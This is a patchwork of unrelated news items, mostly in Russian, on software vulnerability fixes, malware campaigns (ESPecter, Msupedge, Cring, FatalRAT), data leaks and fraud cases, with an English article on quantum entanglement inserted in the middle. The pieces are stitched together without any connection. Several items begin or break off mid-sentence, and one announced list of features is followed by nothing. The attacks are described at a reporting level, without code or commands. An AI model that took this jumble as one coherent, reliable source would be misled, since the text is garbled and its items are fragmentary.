• В обновлении Samba 4.13.16 устранена уязвимость ([CVE-2021-43566](https://security- tracker.debian.org/tracker/CVE-2021-43566)), позволяющая клиенту через манипуляции с символическими ссылками на разделах SMB1 или NFS добиться создания на сервере каталога за пределами экспортируемой области ФС (проблема вызвана состоянием гонки и трудна для эксплуатации на практике, но теоретически возможна). Проблеме подвержены версии до 4.13.16.
Также [опубликован отчёт](https://www.mail-archive.com/samba- announce@lists.samba.org/msg00579.html) об ещё одной похожей уязвимости ([CVE-2021-20316](https://security- tracker.debian.org/tracker/CVE-2021-20316)), позволяющей аутентифицированному клиенту через манипуляции с символическими ссылками прочитать или изменить содержимое файла или метаданных каталога в области ФС сервера за пределами экспортируемого раздела. Проблема устранена в выпуске 4.15.0, но затрагивает и прошлые ветки. При этом исправления для старых веток опубликованы не будут, так как старая архитектура Samba VFS не позволяет устранить проблему из-за привязки операций с метаданными к файловым путям (в Samba 4.15 слой VFS был полностью переделан). Опасность проблемы снижает то, что она достаточно сложна в эксплуатации и права доступа пользователя должны допускать чтение или запись в целевой файл или каталог.
• В выпуске проекта FreeRDP 2.5, предлагающего свободную реализацию протокола удалённого доступа к рабочему столу RDP (Remote Desktop Protocol), устранены три проблемы с безопасностью (идентификаторы CVE не присвоены), которые могут привести к переполнению буфера при использовании некорректной локали, обработки специально оформленных параметров реестра и указании некорректно оформленного имени дополнения. Из изменений в новой версии отмечается поддержка библиотеки OpenSSL 3.0, реализация настройки TcpConnectTimeout, улучшение совместимости с LibreSSL и решение проблем с буфером обмена в окружениях на базе Wayland.
• В новых выпусках свободного антивирусного пакета ClamAV 0.103.5 и 0.104.2 устранена уязвимость [CVE-2022-20698](https://security- tracker.debian.org/tracker/CVE-2022-20698), связанная с некорректным чтением указателя и позволяющая удалённо вызвать крах процесса, если пакет скомпилирован с библиотекой libjson-c и в настройках включена опция CL_SCAN_GENERAL_COLLECT_METADATA (clamscan --gen-json).
• В обновлениях платформы Node.js 16.13.2, 14.18.3, 17.3.1 и 12.22.9 устранены [четыре уязвимости](https://nodejs.org/en/blog/vulnerability/jan-2022-security- releases/): обход проверки сертификата при верификации сетевого соединения из- за некорректного преобразования SAN (Subject Alternative Names) в строковый формат ([CVE-2021-44532](https://security- tracker.debian.org/tracker/CVE-2021-44532)); некорректная обработка перечисления нескольких значений в полях subject и issuer, которую можно использовать для обхода проверки упомянутых полей в сертификатах ([CVE-2021-44533](https://security- tracker.debian.org/tracker/CVE-2021-44533)); обход ограничений, связанных с SAN-типом URI в сертификатах ([CVE-2021-44531](https://security- tracker.debian.org/tracker/CVE-2021-44531)); недостаточная проверка входных данных в функции console.table(), которая может быть использована для назначения пустых строк цифровым ключам ([CVE-2022-21824](https://security- tracker.debian.org/tracker/CVE-2022-21824)).
Исследователи из ESET обнаружили новый, никем не описанный буткит для UEFI, который устанавливается в систему посредством компрометации диспетчера загрузки Windows. Как оказалось, зловред, получивший кодовое имя ESPecter, был создан как минимум в 2012 году и вначале был ориентирован на системы с BIOS.
Буткит позволяет установить контроль над процессом загрузки ОС и обеспечивает хакеру очень стойкое присутствие в системе. Тем не менее, злоумышленники редко применяют такие инструменты: их создание требует хорошей технической подготовки. До находки ESET специалистам по ИБ были известны только четыре случая использования буткита в атаках: Lojax, MosaicRegressor, безымянные модули TrickBot и FinSpy.
Вредонос ESPecter, по словам экспертов, был обнаружен на взломанной машине вместе с клиентским компонентом, обладающим функциями кейлоггера и инфостилера. По всей видимости, атака была проведена с целью шпионажа.
Исследование показало, что новый буткит может устанавливаться в систему двумя способами: посредством подмены главной загрузочной записи на диске (в Legacy- режиме) или через патчинг диспетчера загрузки Windows (bootmgfw.efi).
Версия ESPecter, внедряемая в системный раздел EFI, готовит рабочую среду для целевого зловреда, загружая собственный драйвер режима ядра, способный обойти обязательную проверку цифровой подписи. Этот драйвер, в свою очередь, загружает два компонента режима пользователя — WinSys.dll и Client.dll.
Первый отвечает за сбор информации о зараженной системе и обновление данных конфигурации. Второй работает как бэкдор; он умеет по команде фиксировать клавиатурный ввод, воровать документы, делать снимки экрана, а также автоматически выводить собранную информацию на свой сервер.
Модификация bootmgfw.efi, по свидетельству ESET, возможна только при отключенном режиме безопасной загрузки. Чтобы деактивировать Secure Boot, злоумышленник должен иметь физический доступ к компьютеру либо использовать какую-то уязвимость в прошивке UEFI.
Каким именно образом был внедрен найденный ESPecter, установить не удалось. Во избежание подобных атак эксперты советуют по возможности придерживаться следующих правил:
использовать только новейшую версию прошивки;
следить за настройками системы;
ужесточить контроль доступа к привилегированным аккаунтам;
не отключать режим Secure Boot.
• Source: <https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp- introducing-especter-bootkit/>
Специалисты FACCT обнаружили новую хак-группу, которая рассылает вредоносные письма российским организациям от имени разных компаний и министерств.
В настоящий момент исследователям известно уже о пяти рассылках группы, две из которых были зафиксированы в декабре 2023 года, две — в январе 2024 года, а последняя — в мае. Атаки были направлены на неназванные российские компании из сферы ритейла, телекоммуникаций, процессинговую компанию, агропромышленное объединение и федеральный фонд.
Согласно отчету компании, в одной из вредоносных рассылок хакеры маскировались под интернет-магазин Skyey, сообщая жертве, что та якобы выиграла подарочную карту номиналом 10 000 рублей. В другой рассылке цели предлагали фальшивую скидку на запчасти для автомобилей УАЗ, а в третьем случае злоумышленники пытались выдать себя за Минцифры РФ и сообщали о необходимости установки сертификатов безопасности.
[](https://xakep.ru/wp-
content/uploads/2024/06/465396/ris.1-reaverbits.png)
[](https://xakep.ru/wp-
content/uploads/2024/06/465396/ris.3-reaverbits.png)
Среди характерных для ReaverBits особенностей эксперты перечисляют следующие:
MetaStealer впервые был обнаружен еще в марте 2022 года. Он представляет собой форк известного стилера RedLine, предназначенного для кражи конфиденциальной информации из системы жертвы. Стилер продает на хак-форумах злоумышленник под псевдонимом META.
Исследователи напоминают, что ранее этот стилер использовался многими группировками, в частности ReaverBits, Sticky Werewolf, VasyGrek и, вероятно, другими.
Коллектив хактивистов Anonymous говорит, что получил доступ к огромному количеству данных от Epik, веб-хостинга и регистратора доменов для множества сайтов правого толка. По сообщениям, список клиентов Эпика варьировался от более основных консервативных групп, таких как Республиканская партия Техаса, до Габа и других ультраправых сайтов на периферии Интернета.
В пресс-релизе Anonymous говорится, что компания Epik собрала «данные за десятилетие». Они говорят, что данные включают в себя регистрации доменов, передачу доменов, пароли, учетные данные всех клиентов Epik, логины, более полумиллиона закрытых ключей, историю платежей, «дамп почтового ящика сотрудника, просто потому что мы могли» и более. О закрытых ключах они написали: «Для чего они нужны? Кто знает!"
«Этот набор данных - все, что нужно для отслеживания фактического владения и управления фашистской стороной Интернета, которая ускользнула от исследователей, активистов и, ну, почти всех», - заявили они.
«И, может быть, немного повеселимся. Для лулзов.
В публикации также содержится призыв к людям поддержать как самих хакеров, так и операцию «Джейн» - инициативу, которую коллектив недавно начал в знак протеста против запрета на аборты в Техасе. В рамках последней попытки на выходных Anonymous взломали и испортили веб-сайт Техасской республиканской партии.
Роб Монстр, генеральный директор Epik, преуменьшил значение и подлинность предполагаемого взлома его компании. В Твиттере Monster назвал это «нерассказом» и «ничтожеством».
Об этом впервые сообщил журналист Стивен Моначелли.
__https://twitter.com/x/status/1437543353357328389
Во вторник Anonymous обновили пресс-релиз, заявив, что они работают над предоставлением данных в более доступном формате.
«Почти готово, поверьте, я хочу вздремнуть», - написали они.
На момент написания этой статьи релиз завершается ударом по Монстру и его компании.
«Мы хотим, чтобы список файлов был виден сразу, чтобы Роб мог еще больше попотеть. Мы просто катимся в этом направлении ».
«Теперь он знает, что это реально, и как он трахается, и это прекрасно».
Источник: <https://www.dailydot.com/debug/anonymous-hack-far-right-web-host- epik/>
A research team used a cable to entangle qubits located in different quantum
nodes. This could go a long way in creating a powerful cluster of quantum
devices.
Scientists have succeeded for the first time in entangling two separate qubits
by connecting them via a cable, in a breakthrough that will likely accelerate
the creation of [quantum networks](https://www.zdnet.com/article/a-quantum-
computer-just-solved-a-decades-old-problem-three-million-times-faster-than-a-
classical-computer/) – which, by combining the capabilities of several quantum
devices, could boost the potential of the technology even in its current
limited state.
The researchers, from the University of Chicago's Cleland Lab, created two quantum nodes, themselves containing three superconducting qubits each. Using a one-meter-long superconducting cable to connect the nodes, the scientists then chose one qubit in each node and entangled them together by sending so- called "entangled quantum states" through the cable.
Taking the form of microwave photons, these entangled quantum states are
extremely fragile, which makes the process particularly challenging; but the
researchers nevertheless [managed to transfer the entanglement from one node
to the other](https://pme.uchicago.edu/news/first-time-researchers-send-
entangled-qubit-states-through-communication-channel), linking the qubits into
a special quantum state that is still both fascinating and confounding to
quantum scientists.
Qubits, or quantum bits, are the basic unit of quantum information, and their
properties can be exploited to create next-generation quantum technologies;
one of those properties is entanglement. Entanglement happens when two qubits
are made to interact in a certain way, and they become inexplicably linked.
Once entangled, they start sharing the same properties, no matter how distant
they are from each other.
This means that by looking at one half of an entangled pair, scientists can know the properties of the other particle, even if they are thousands of kilometers away. Using entanglement, scientists could create webs of linked qubits, which could in turn help make quantum computing more powerful, as well as lay the groundwork for future quantum communication networks.
"Developing methods that allow us to transfer entangled states will be essential to scaling quantum computing," said Andrew Cleland, professor at the University of Chicago, who led the research.
For entanglement to be useful, it has to be established in the first place – something that is easier said than done. Within the Cleland Lab scientists' two-node experimental set-up, entanglement was transferred from node to cable to node in only a few tens of nanoseconds. With a nanosecond representing just one billionth of a second, the achievement was widely hailed as a successful one.
Using a one-meter-long superconducting cable to connect the nodes, the
scientists then chose one qubit in each node and entangled them together
Image: Cleland Lab
Quantum scientists around the world are actively working on different ways to
establish entanglement between two qubits, but the most common procedure so
far has consisted of creating a pair of entangled particles, and then
distributing them between two points.
For example, once they are entangled, qubits can travel through networks of optical fiber. Last year, in fact, another group of researchers from the University of Chicago [used an existing underground network of optical fiber](https://news.uchicago.edu/story/argonne-uchicago-scientists-take- important-step-developing-national-quantum-internet) to support entangled photons travelling across a 52-mile network in the city's suburbs.
Another method consists of using satellites as a source of entangled photons, which allows the particles to travel over much longer distances. China is leading in this space: in 2017, the country's satellite Micius [successfully delivered entangled particles](https://www.techrepublic.com/article/china- sends-unbreakable-code-from-quantum-satellite-to-earth/) to ground stations up to 1,200 kilometers away.
Transferring entanglement from one qubit to another one located in another quantum node, however, is an unprecedented experiment. It doesn't stop here: once the Cleland Lab researchers used the cable to entangle two qubits in each of the two nodes, they then managed to extend this entanglement to the other qubits in each node.
In other words, Cleland and his team "amplified" the entanglement of qubits, until all six qubits in the two nodes were entangled in a single globally entangled state. The next challenge? To expand the system to three nodes, to build three-way entanglement.
By building up this small-scale network of entangled particles, the scientists are getting closer to establishing a quantum network that could have big implications for quantum computing. Entanglement could effectively be used to create quantum clusters, made up of linked qubits located in different quantum devices.
Much like supercomputers today carry out parallel calculations on many CPUs connected to one another, it is widely expected that in the future, quantum computing will be enabled by many different modules of such entangled qubits, all connected to each other to run a computation. "These modules will need to send complex quantum states to each other, and this is a big step towards that," said Cleland.
The quantum computers currently developed by tech giants the likes of IBM and Google can only support less than 100 qubits – nowhere near enough for the technology to start having a real-world impact. The companies are confident that quantum computers [will scale up sooner rather than later](https://www.zdnet.com/article/ibm-plots-quantum-computing-roadmap- eyes-1121-qubit-system-in-2023/); but a quantum network could, in principle, start showing results before a fully-fledged quantum computer sees the light of day.
In effect, by linking together quantum devices that, as they stand, have limited capabilities, scientists expect that they could create a quantum supercomputer more powerful than a quantum device operating on its own.
In addition to advancing quantum computing, a network of interlinked qubits could also enable new applications in the realm of quantum communications. The US and Chinese governments, as well as the EU, have all shown a marked interest in developing a quantum internet in recent years, which [will rely on entanglement to exchange quantum information](https://www.zdnet.com/article/what-is-the-quantum-internet- everything-you-need-to-know-about-the-weird-future-of-quantum-networks/) between quantum devices. One of the key applications of such a quantum network would be quantum key distribution – an un-hackable cryptography protocol that, once more, relies on inter-linked quantum particles.
Согласно утверждению прокурора, Майкл Лаучлан, скрывающийся под псевдонимом Макса Хэндлера, занимался обманов клиентов, пытающихся вернуть свои потерянные криптоактивы.
Для этой цели он выдавал себя за вице-президента компании Coin Dispute Network, и главного специалиста по возврату средств. Доверчивые клиенты платили ему за консультации в ETH, предполагая, что он вернет их монеты.
Лаучлан рассказывал жертвам, что ему известно, как вернуть утраченные криптовалюты, но за эту услугу нужно будет заплатить. Естественно, несчастные соглашались на это, но взамен не получали ничего. По утверждению прокурора, мошенник обманул десятки людей, и точная сумма причиненного ущерба сейчас уточняется.
Самое забавное, что при всем этом компания Coin Dispute Network, имеет дурную репутацию — еще летом 2023 года сайт компании был проверен сотрудниками офиса окружного прокурора округа Манхэттена, и выяснилось, что контора занималась мошенническими сделками с криптовалютой. От действий компании пострадали несколько сотен человек, а ущерб исчислялся сотнями тысяч долларов. Но по всей видимости, клиенты мошенника не знали об этом ничего, раз считали его вице- президентом фирмы, которая уже запятнала себя.
Сейчас прокуратура готовит материалы дела в суд, где ловкому дельцу изберут меру наказания за обман и воровство средств клиентов.
Сколько ты заработал на крипте?
— 325 лет
В Соединённых Штатах Америки бывшие топ-менеджеры стартапа в области медицинских технологий Outcome Health, основанной в Чикаго в 2006 году, были осуждены за мошенничество, в результате которого инвесторы и кредиторы потеряли около $1 млрд. Свою сложную мошенническую схему осужденные провернули втроём:
• Риши Шах, 38 лет, соучредитель и бывший генеральный директор Outcome Health;
• Шрадха Агарвал, 38 лет, бывший президент компании;
• Брэд Пёрди, 35 лет, бывший операционный и финансовый директор компании.
Компания Outcome Health предоставляла телевизоры и планшеты для использования в залах ожидания врачей и продавала рекламу на этих устройствах, главным образом фармацевтическим компаниям. Однако, по данным Министерства юстиции США , на самом деле фирма продавала несуществующие рекламные места и многократно завышала показатели взаимодействия пациентов с контентом в клиниках.
Мошенническая схема, действовавшая с 2011 по 2017 год, привела к переплатам за рекламные услуги на сумму не менее $45 млн. Это искусственно увеличило доходы компании в 2015 и 2016 годах, что позволило Шаху, Агарвалу и Пёрди привлечь $110 млн в виде долгового финансирования в апреле 2016 года, $375 млн в декабре 2016 года и $487,5 млн в виде долевого финансирования в начале 2017 года.
По данным Минюста США, финансирование в размере $110 млн принесло Шаху дивиденды в размере $30 млн, а Агарвал — $7,5 млн. Долевое финансирование в размере $487,5 млн привело к выплате дивидендов на сумму $225 млн, которые также получили Шах и Агарвал.
Главный заместитель помощника генерального прокурора Николь Арджентиери отметила, что приговоры должны служить напоминанием о недопустимости обмана ради успеха. «Мошенничество, как в случае с Outcome Health, — это преступление, которое должно наказываться», — заявила она.
Федеральное жюри признало тройку виновной в апреле 2023 года. И лишь на днях мошенникам был вынесен финальный приговор:
• Шах был осужден по пяти пунктам обвинения в почтовом мошенничестве, десяти пунктам обвинения в мошенничестве с использованием электронных средств связи, двум пунктам банковского мошенничества и двум пунктам отмывания денег. Ему назначен срок тюремного заключения в семь с половиной лет.
• Агарвал была осуждена по пяти пунктам обвинения в почтовом мошенничестве, восьми пунктам обвинения в мошенничестве с использованием электронных средств связи и двум пунктам банковского мошенничества. Она была приговорена к трём годам в реабилитационном центре.
• Пёрди был осужден по пяти пунктам обвинения в почтовом мошенничестве, пяти пунктам обвинения в мошенничестве с использованием электронных средств связи, двум пунктам банковского мошенничества и одному пункту за ложные заявления финансовому учреждению. Мужчина получил два года и три месяца тюрьмы.
По данным ФБР, инвестиционное мошенничество стало самой прибыльной категорией киберпреступлений в прошлом году, причинив ущерб на сумму более $4,5 млрд.
• Source: https://www.justice[.]gov/opa/pr/three-former-executives- sentenced-1b-corporate-fraud-scheme
• Source: https://www.ic3[.]gov/Media/PDF/AnnualReport/2023_IC3Report.pdf
Сначала они позвонили 38-летней управляющей и убедили её взять кредит, а потом перевести все деньги на «безопасный счёт». Женщина обратилась за помощью к своей коллеге, и они поехали в банк вместе. По дороге в банк мошенник «обработал» и коллегу.
После этого, злоумышленник заверил женщин в том, что денег могут лишиться и остальные сотрудники. Иркутянки вернулись на рабочее место и всем рассказали тревожную новость, после которой весь коллектив пошёл в банк брать кредиты и переводить деньги мошенникам. Все вместе они отдали мошенникам более 3 млн рублей.
ИБ-специалисты [обнаружили](https://symantec-enterprise- blogs.security.com/threat-intelligence/taiwan-malware-dns), что неизвестные злоумышленники развернули в Windows-системах одного из университетов Тайваня ранее неизвестный бэкдор под названием Msupedge. Для атаки на образовательное учреждение, судя по всему, использовалась недавно исправленная RCE-уязвимость в PHP (CVE-2024-4577).
Напомним, что RCE-уязвимость CVE-2024-4577 (9,8 балла по шкале CVSS) в PHP-CGI была раскрыта в начале июня 2024 года. Она позволяет злоумышленнику удаленно выполнять вредоносные команды в Windows-системах. Проблема усугубляется при использовании некоторых локализаций, которые более восприимчивы к этому багу, включая традиционный китайский, упрощенный китайский и японский.
Как теперь сообщили специалисты Symantec Threat Hunter Team, Msupedge распространялся при помощи двух библиотек (weblog.dll и wmiclnt.dll), первая из которых загружалась процессом httpd.exe Apache, а родительский процесс для второй DLL остался неустановленным.
Отличительной особенностью Msupedge эксперты называют использование DNS- трафика для связи с управляющим сервером. DNS-туннелирование (функция реализована на базе опенсорсного инструмента dnscat2) позволяет хакерам инкапсулировать данные в DNS-запросы и ответы для получения команд от управляющего сервера. Так, злоумышленники могут использовать Msupedge для выполнения различных команд, которые запускаются на основе третьего октета разрешенного IP-адреса управляющего сервера.
И хотя некоторые хак-группы использовали такие методы в прошлом, отмечается, что в реальных атаках они все же встречаются редко.
Что касается самого бэкдора, эксперты предупредили, что Msupedge мог использоваться хакерами для выполнения различных команд, включая создание процессов, загрузку файлов и управление временными файлами.
Стоит отметить, что проблема CVE-2024-4577 уже используется для атак и другими хакерами. К примеру, в июле 2024 года специалисты Akamai сообщали, что множество злоумышленников используют эту уязвимость для распространения троянов удаленного доступа, криптовалютных майнеров и организации DDoS-атак.
В том же месяце аналитики компании Imperva [писали](https://www.imperva.com/blog/update-cve-2024-4577-quickly-weaponized- to-distribute-tellyouthepass-ransomware/), что баг начали эксплуатировать участники вымогательской группировки TellYouThePass для распространения .NET- варианта своего шифровальщика.
Пользователи антивируса Norton 360 обвинили разработчиков в несанкционированном майнинге криптовалют на их устройствах
Антивирус Norton 360 начал без разрешения запускать на компьютерах
пользователей майнер криптовалют.
Как сообщает ресурс Digital Trends, зачастую антивирус майнит без какого-либо
разрешения со стороны пользователей. Кроме того, избавиться под нововведения
крайне сложно.
Криптовалюту майнит штатный модуль Norton Crypto (NCrypt.exe), входящий в
состав антивируса. Он стал частью ПО в июле 2021 г., однако в первые полгода
своего существования ни о каком автоматическом его запуске и речи не было.
Теперь пользователи не могут не только отключить майнинг, расходующий ресурсы
их ПК и ноутбуков, но и просто удалить крипто-модуль из-под интерфейса Norton
360 или при помощи штатного деинсталлятора. Установленный майнер можно удалить
лишь только полностью удалив антивирус с чисткой реестра.
Отметим, что майнер ставится в процессе установки, если пользователь не
снимает соответствующую галочку, которую отвлекшиеся пользователи часто не
замечают.
Производитель утверждает, что Norton Crypto не может быть запущен без согласия
пользователя. Примечательно, что антивирусы других фирм распознают NCrypt.exe
как вредоносное ПО.
Фирма Norton сама создаёт криптокошелёк для пользователя, при этом взимая
непонятную комиссию в размере 15%. Программа Norton Crypto уже входит в пакет
платных подписок, однако пользователь должен дополнительно выплачивать
15-процентную комиссию с майнерского дохода, без учёта стоимости транзакций.
Задержания прошли в 11 провинциях, некоторые из задержанных были несовершеннолетние.
40 человек были задержаны турецкой полицией в ходе операции против мошенников, использовавших популярный стриминговый сервис Twitch, сообщило издание Dailysabah.
Впервые информация о турецком скандале появилась в ноябре 2021 года. Тогда выяснилось, что многие местные стримеры помогают мошенникам отмывать деньги через покупку Bits на Twitch с краденых кредитных карт. Инфлюэнсеры возвращали им 70-80% своей прибыли.
По данным агентства DHA (Demirören News Agency), в схему были вовлечены в том числе несовершеннолетние и киберспортсмены. В частности в скандал был замешан чемпион мира по Valorant Мехмет «cNed» Ягиз Ипек.
Напомним, на преступную схему обратили внимание после масштабной утечки данных пользователей Twitch в начале октября. Зрители заметили, что в базе данных есть несколько видеоблогеров с небольшой аудиторией, зарабатывающих слишком крупные суммы на валюте Bits. После этого мошенниками занялся турецкий департамент по борьбе с киберпреступностью.
В начале 2021 года злоумышленники провели серию атак с использованием шифровальщика Cring. Об этих атаках упоминали исследователи Swisscom CSIRT, однако не было известно, как именно шифровальщик попадает в сеть организаций. Расследование инцидента, проведенное экспертами Kaspersky ICS CERT на одном из атакованных предприятий, выявило, что в атаках используется уязвимость в VPN- серверах Fortigate.
Среди жертв злоумышленников оказались промышленные предприятия в странах Европы. По крайней мере в одном из случаев атака шифровальщика привела к временной остановке производства на двух итальянских заводах международного промышленного холдинга с головной организацией в Германии.
В серии атак злоумышленники эксплуатировали уязвимость CVE-2018-13379 в VPN- серверах Fortigate для получения первоначального доступа к сети предприятия. Эта уязвимость позволяет неаутентифицированному злоумышленнику подключиться к устройству и удаленно получить доступ к файлу сеанса, который содержит имя пользователя и пароль в открытом виде. Проблема была исправлена производителем в 2019 году, но обновления по-прежнему установили не все. Осенью 2020 в даркнете начали появляться предложения о покупке базы IP-адресов уязвимых устройств.
В ходе расследования выяснилось: за некоторое время до начала основной фазы атаки злоумышленники выполнили тестовые подключения к VPN-шлюзу, видимо, чтобы убедиться, что украденные в ходе атаки на VPN-сервер данные аутентификации остаются актуальными. В день атаки, получив доступ к первой системе в корпоративной сети, операторы Cring использовали Mimikatz для кражи учетных записей пользователей Windows, ранее выполнивших вход на скомпрометированном компьютере. С ее помощью злоумышленникам посчастливилось сразу украсть учетные данные доменного администратора.
После непродолжительной разведки злоумышленники выбрали несколько систем, которые сочли важными для функционирования промышленного предприятия, и сразу загрузили и запустили на них шифровальщик Cring.
«Различные детали атаки указывают, что злоумышленники тщательно изучили инфраструктуру атакуемой организации, после чего подготовили свой инструментарий с учетом информации, собранной на этапе разведки. Например, скрипты злоумышленников маскировали активность вредоносного ПО под работу защитного решения, используемого на предприятии, и завершали процессы серверов баз данных (Microsoft SQL Server) и систем резервного копирования (Veeam), используемых на системах, которые были выбраны для шифрования. Анализ действий злоумышленников показывает, что в результате изучения сети атакуемой организации для шифрования были выбраны серверы, потеря доступа к которым, по мнению злоумышленников, могла нанести максимальный ущерб работе предприятия», — комментирует Вячеслав Копейцев, старший эксперт Kaspersky ICS CERT.
Click to expand...
Источник: xakep.ru/2021/04/08/cring/
management system to a Russia-linked APT group.
The Ukraine ‘s government blames a Russia-linked APT group for an attack on a
government document management system, the System of Electronic Interaction of
Executive Bodies (SEI EB).
According to Ukrainian officials, the hackers aimed at disseminating malicious
documents to government agencies.
The SEI EB is used by the Ukrainian government agencies to share documents.
According to Ukraine’s National Security and Defense Council, attackers acted to conduct “the mass contamination of information resources of public authorities.”
_“The National Coordination Center for Cybersecurity under the National Security and Defense Council of Ukraine has recorded attempts to disseminate malicious documents through the System of Electronic Interaction of Executive Bodies (SEI EB).” reads astatement published by the NSDC.
“The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most public authorities.”_
The @ncsccUA warns of a cyberattack on the document management system of state bodies. The attack belongs to the so-called supply chain attacks. Methods and means of carrying out this cyberattack allow to connect it with one of Russia's hacker spy groups.https://t.co/ICgYxuuflH
— NSDC of Ukraine (@NSDC_ua) February 24, 2021Click to expand...
According to the Ukrainian authorities, the threat actors uploaded weaponized documents to the document management system. When the users that downloaded the files enabled the macros in the document, they would download and execute malware that allowed the attacker to take control of a victim’s computer.
_“The malicious documents contained a macro that secretly downloaded a program to remotely control a computer when opening the files. The methods and means of carrying out this cyberattack allow to connect it with one of the hacker spy groups from the Russian Federation.” continues the statement.
“According to the scenario, the attack belongs to the so-called supply chain attacks. It is an attack in which attackers try to gain access to the target organization not directly, but through the vulnerabilities in the tools and services it uses.”_
The NSDC did not attribute the attack to a specific Russia-linked cyberespionage group, the agency also provides indicators of compromise (IOCs) related to this attack.
Early this week, Ukraine accused unnamed Russian internet networks of [massive attacks that targeted Ukrainian security and defense websites](https://securityaffairs.co/wordpress/114913/cyber-warfare-2/russian- networks-ukraine-sites.html). The Ukrainian officials did not provide details about the attacks either the damage they have caused.
“It was revealed that addresses belonging to certain Russian traffic networks were the source of these coordinated attacks,” the Council said.
The Ukrainian authorities did not attribute the attack to a specific threat actor.
“Kyiv has previously accused Moscow of orchestrating large cyber attacks as part of a “hybrid war” against Ukraine, which Russia denies. However, a statement from Ukraine’s National Security and Defence Council did not disclose who it believed organized the attacks or give any details about the effect the intrusions may have had on Ukrainian cyber security.”[reported](https://www.reuters.com/article/ukraine-cyber/ukraine- accuses-russian-networks-of-new-massive-cyber-attacks-idUSL1N2KS1BD) The Reuters agency.
The massive attacks began on February 18, hackers targeted the websites of local institutions, including Ukraine’s Security Service and the council.
Russian Dutch-domiciled search engine, ride-hailing and email service provider Yandex on Friday disclosed a data breach that compromised 4,887 email accounts of its users.
The company blamed the incident on an unnamed employee who had been providing unauthorized access to the users' mailboxes for personal gain.
"The employee was one of three system administrators with the necessary access rights to provide technical support for the service," Yandex said in a statement.
The company said the security breach was identified during a routine audit of its systems by its security team. It also said there was no evidence that user payment details were compromised during the incident and that it had notified affected mailbox owners to change their passwords.
«Пушкинскую карту» сдали суду
Закончено уголовное дело о хищении бюджетных средств
Генеральная прокуратура России утвердила обвинительное заключение по уголовному делу о масштабных хищениях средств, выделенных из бюджета на программу «Пушкинская карта», предоставляющую молодежи право бесплатно посещать государственные музеи, театры и другие учреждения культуры. По версии ГСУ СКР, индивидуальные предприниматели Виктор Якубов и Эмиль Гурбанов, а также студент МГИМО Илья Сафонов путем махинаций с картами причинили ущерб на сумму около 200 млн руб. Материалы уголовного дела направлены в суд для рассмотрения по существу.
О завершении расследования масштабных махинаций при реализации программы «Пушкинская карта» сообщили Генпрокуратура РФ и Следственный комитет России, который вел это дело.
Напомним, программа «Пушкинская карта» была запущена Министерством культуры РФ в августе 2021 года. Оформить карту можно через аккаунт на портале «Госуслуги». Государство зачисляет на нее 5 тыс. руб., которые можно потратить на покупку билетов в музеи, театры, филармонии, на выставки и концерты. Выбрать понравившееся мероприятие можно, например, на портале «PRO.Культура.РФ». При этом ни обналичить средства, ни перевести их на другую карту владельцам невозможно. Именно этим и решили воспользоваться мошенники, предлагавшие владельцам карт разнообразные способы обналички. Тем более что к реализации программы были привлечены и частные структуры, в ряде случаев не имеющие соответствующих лицензий.
По версии следователей, Виктор Якубов, Эмиль Гурбанов и Илья Сафонов разработали план хищения денег с карт еще в начале 2022 года. Они, считают правоохранители, действовали по вполне стандартной схеме. Злоумышленники, по версии следствия, оформлялись индивидуальными предпринимателями, открывали счета в банках, а затем регистрировались на платформе «PRO.Культура.РФ» в качестве организаторов культурных мероприятий. После этого «для создания видимости реального исполнения своих обязательства они заключили договоры аренды помещений, а также провели переговоры с представителями артистов, которые подходили под критерии программы», говорится в материалах расследования. Затем сообщники искали среди пользователей сети Интернет владельцев «пушкинских карт» «с неиспользованным лимитом денежных средств, которых склоняли к приобретению билетов на культурные мероприятия, организуемые участниками преступной группы». Одновременно с этим злоумышленники подыскивали людей, которые соглашались оформить «пушкинские карты», выпущенные оператором программы — АО «Почта Банк», с указанием в них «заведомо недостоверных персональных данных получателей». Кроме того, карты у желающих получить наличные молодых людей за полцены — эта услуга даже рекламировалась в соцсетях. После чего все эти карты использовались «для массового приобретения билетов на культурные мероприятия без цели их посещения». В ходе проверки этих операций выяснилось, что зачастую количество приобретенных билетов «многократно превышало зрительскую вместимость концертных площадок», арендованных злоумышленниками. В результате средства, поступившие за билеты, которыми на самом деле никто не пользовался, доставались организаторам мероприятий.
Нужно отметить, что о признаках недобросовестного использования «пушкинских карт» в сентябре 2022 года сообщила министр культуры РФ Ольга Любимова. После этого ее ведомство занялось выявлением «признаков незаконной продажи билетов для блокировки деятельности мошенников». К проверкам подключились и правоохранительные органы, в результате в ряде регионов была пресечена деятельность нескольких групп аферистов, получавших бюджетные деньги за проведение фиктивных культурных мероприятий.
По данным СКР, Виктор Якубов, Эмиль Гурбанов и Илья Сафонов также предоставляли в Министерство культуры РФ недостоверные сведения о проведении мероприятий.
Причем для сокрытия преступной деятельности они, говорится в деле, привлекали в массовку «лиц, не осведомленных о совершаемом хищении», но даже в этом случае, как установили следователи, количество «зрителей» на мероприятиях «было значительно меньше, чем в отчетных данных». Таким образом злоумышленникам «путем предоставления недостоверных сведений удалось похитить более 205 млн руб. бюджетных и банковских средств».
Задержали фигурантов в конце ноября 2022 года, а 2 декабря Басманный суд Москвы отправил их по ходатайству ГСУ СКР под стражу. По данным “Ъ”, в ходе предварительного следствия вину признал лишь Эмиль Гурбанов, а его сообщники продолжают настаивать, что все мероприятия были абсолютно реальными и поэтому государственные средства были израсходованы по назначению.
В январе этого года подследственным Якубову, Гурбанову и студенту Сафонову было предъявлено обвинение в окончательной редакции по ч. 4 ст. 159 УК РФ и объявлено об окончании следственных действий. Теперь же Генеральная прокуратура утвердила обвинительное заключение по 30-томному делу и направила материалы на рассмотрение в Басманный суд Москвы.
Троян, открывающий операторам удалённый доступ к целевому устройству, распространяется с помощью Telegram-каналов. Как рассказали исследователи из AT&T Alien Labs, пользователи могут наткнуться на ссылки для загрузки вредоноса в новостных каналах, посвящённых софту.
Согласно отчёту специалистов, RAT-вредонос под именем FatalRAT может запускаться на устройстве жертвы удалённо, а также обходить защитные средства.
Попав в систему, FatalRAT записывает нажатия клавиш, собирает информацию об ОС и передаёт все данные операторам по зашифрованному каналу. За последние несколько месяцев эксперты AT&T Alien Labs наблюдали за использованием трояна в реальных атаках, однако они пока не смогли установить хотя бы приблизительное количество жертв вредоносной программы.
Так или иначе, каналы в Telegram помогают FatalRAT охватить немалую аудиторию потенциальных целей. Напомним, что в отличие от групп в Telegram-каналах могут публиковать сообщения только их администраторы, так что вся ответственность за распространение зловреда лежит исключительно на них.
